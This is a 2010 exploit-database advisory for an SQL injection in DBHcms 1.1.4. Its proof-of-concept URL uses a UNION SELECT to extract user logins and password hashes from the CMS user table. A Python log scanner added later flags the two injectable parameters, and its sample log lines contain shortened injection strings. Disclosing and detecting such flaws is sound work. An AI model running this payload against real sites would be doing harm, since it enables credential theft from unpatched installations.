[webapps / 0day] - DBHcms 1.1.4 SQL Injection Vulnerability
Posted on 24 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />
<meta http-equiv='Content-Language' content='en' />
<title>DBHcms 1.1.4 SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title>
<meta name='description' content='DBHcms 1.1.4 SQL Injection Vulnerability by ZonTa in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' />
<link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' />
<link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' />
</head>
<body>
<pre>
========================================
DBHcms 1.1.4 SQL Injection Vulnerability
========================================

# Exploit Title: DBHcms 1.1.4 SQL Injection Vulnerability
# Date: 24-10-2010
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com
# IM : zontahackers[at]live[dot]com
# Software Link: http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
# Version: 1.1.4
# Tested on: Apache,PHP5

ABOUT
--------------
DBHcms is an open source content management system for personal and small
business websites. It is search engine optimized, including for multiple
languages simultaneously, by allowing the search engine bot to index every
single page.

POC
--------------
http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--

FIX
--------------
Not yet released.

Greetz to Sri Lankanz ~

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-24]
</pre>
</body>
</html>
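Added example (not part of the original advisory and not DBHcms code): with no fix released, this log check flags requests whose `dbhcms_pid` or `editmenu` value, the two parameters in the POC, is not a plain integer ID. It assumes Apache common/combined log format and that legitimate values are non-negative integers; the function names and sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters taken from the POC URL on this page.
WATCHED_PARAMS = ("dbhcms_pid", "editmenu")
# Assumption: legitimate values are plain non-negative integer IDs.
VALID_ID = re.compile(r"[0-9]+")
# Request line inside an Apache common/combined log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return {param: decoded value} for watched parameters that are not integer IDs."""
    match = REQUEST.search(log_line)
    if not match:
        return {}
    query = urlsplit(match.group(1)).query
    # parse_qs percent-decodes values and turns '+' into spaces, so encoded
    # variants are compared in the same form as plain ones.
    params = parse_qs(query, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if not VALID_ID.fullmatch(value):
                hits[name] = value
    return hits


def scan(lines):
    """Return (client_ip, hits) for every log line with a suspicious parameter."""
    findings = []
    for line in lines:
        hits = suspicious_params(line)
        if hits:
            findings.append((line.split(" ", 1)[0], hits))
    return findings


# Constructed sample log lines (not real traffic); payloads are shortened.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Oct/2010:10:00:01 +0000] "GET /DBHcms/index.php?dbhcms_pid=81 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [24/Oct/2010:10:00:05 +0000] "GET /DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2+from+t-- HTTP/1.1" 200 7311',
    '198.51.100.9 - - [24/Oct/2010:10:00:09 +0000] "GET /DBHcms/index.php?dbhcms_pid=5&editmenu=%2d2%20UNION%20SELECT%201 HTTP/1.1" 200 7290',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
```

The same integer-only rule can be enforced in front of the application (for example in a request filter) until a vendor fix exists.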